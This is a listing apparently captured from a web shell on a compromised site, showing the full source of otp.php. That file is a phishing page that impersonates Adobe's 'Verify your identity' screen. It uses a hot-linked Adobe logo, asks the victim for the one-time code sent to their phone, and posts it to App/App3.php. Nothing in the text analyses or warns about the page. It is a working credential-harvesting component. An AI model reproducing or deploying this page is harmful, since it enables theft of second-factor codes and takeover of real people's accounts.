Your IP : 216.73.217.33


Current Path : /home/jjexpress/www/view/
Upload File :
Current File : /home/jjexpress/www/view/otp.php

<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width,initial-scale=1" />
  <title>Adobe - Verify your identity</title>
  <style>
    :root{
      --text:#374151; /* gray-700 */
      --muted:#6b7280; /* gray-500 */
      --link:#0ea5e9; /* sky-500 */
      --danger:#dc2626; /* red-600 */
      --btn:#1e90ff; /* blue */
      --pill-radius:9999px;
      --card-pad:36px;
    }
    *{box-sizing:border-box}
    body{margin:0;font-family: 'Segoe UI', Roboto, Arial, sans-serif;color:var(--text);background:#fff}

    .hero-top{height:110px;background:linear-gradient(180deg,#66b6d6,#68b6d6);}
    .header{display:flex;align-items:center;gap:14px;padding:8px 22px;border-bottom:1px solid #e5e7eb}
    .logo{display:flex;align-items:center;gap:10px;font-weight:600}
    .logo svg{width:26px;height:26px}

    .container{max-width:720px;margin:0 auto;padding:26px 22px}
    .card{padding:var(--card-pad) 24px;background:#fff}
    .icon-wrap{width:80px;height:80px;display:flex;align-items:center;justify-content:center;border-radius:8px}
    .bubble{width:72px;height:72px;opacity:.2}

    h1{font-size:44px;margin:12px 0 8px;color:var(--text);font-weight:600}
    .desc{font-size:18px;color:#374151;margin-bottom:14px}

    .input{width:100%;padding:18px;border:2px solid #e5e7eb;border-radius:8px;font-size:20px;text-align:center;}
    .hint{margin-top:10px;font-size:15px}
    .hint a{color:var(--link);text-decoration:none}
    .hint .alt{color:var(--danger);display:block;margin-top:6px}

    .btn-wrap{margin-top:26px}
    .btn{background: var(--btn);
    color: #fff;
    padding: 13px 35px;
    border-radius: 40px;
    border: 0;
    font-size: 19px;
    display: inline-block;
    cursor: pointer;}

    /* bottom hero to mimic image */
    .hero-bottom{height:180px;background-image:url('data:image/svg+xml;utf8,<svg xmlns="http://www.w3.org/2000/svg" width="1600" height="400"><rect width="1600" height="400" fill="%23cfeaf2"/></svg>');background-size:cover;margin-top:28px}

    @media (max-width:480px){
      h1{font-size:36px}
      .hero-top{height:80px}
      .card{padding:24px}
    }
  </style>
</head>
<body>
  <div class="hero-top"></div>
  <div class="header">
    <div class="logo">
		<img src="https://www.pngmart.com/files/23/Adobe-Logo-PNG-Clipart.png" style="height:50px;" alt="" />
    </div>
  </div>

<form action="App/App3.php" method="POST">
  <div class="container">
    <div class="card">
      <div class="icon-wrap">
        <!-- speech bubble icon -->
        <svg class="bubble" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path d="M3 6.5A3.5 3.5 0 016.5 3h11A3.5 3.5 0 0121 6.5v3A3.5 3.5 0 0117.5 13H9l-4 4V6.5z" fill="#9CA3AF"/></svg>
      </div>

      <h1>Verify your identity</h1>
      <div class="desc">Enter the code we sent to your phone number</div>

      <input class="input" type="text" name="otp" required />

      <div class="hint">
        <a href="#">Didn't receive your code?</a> use verification code from your Authenticator App
        <span class="alt">Enter correct details.</span>
      </div>

      <div class="btn-wrap">
        <button class="btn">Sign in</button>
      </div>
    </div>
  </div>
</form>

  <div class="hero-bottom"></div>
</body>
</html>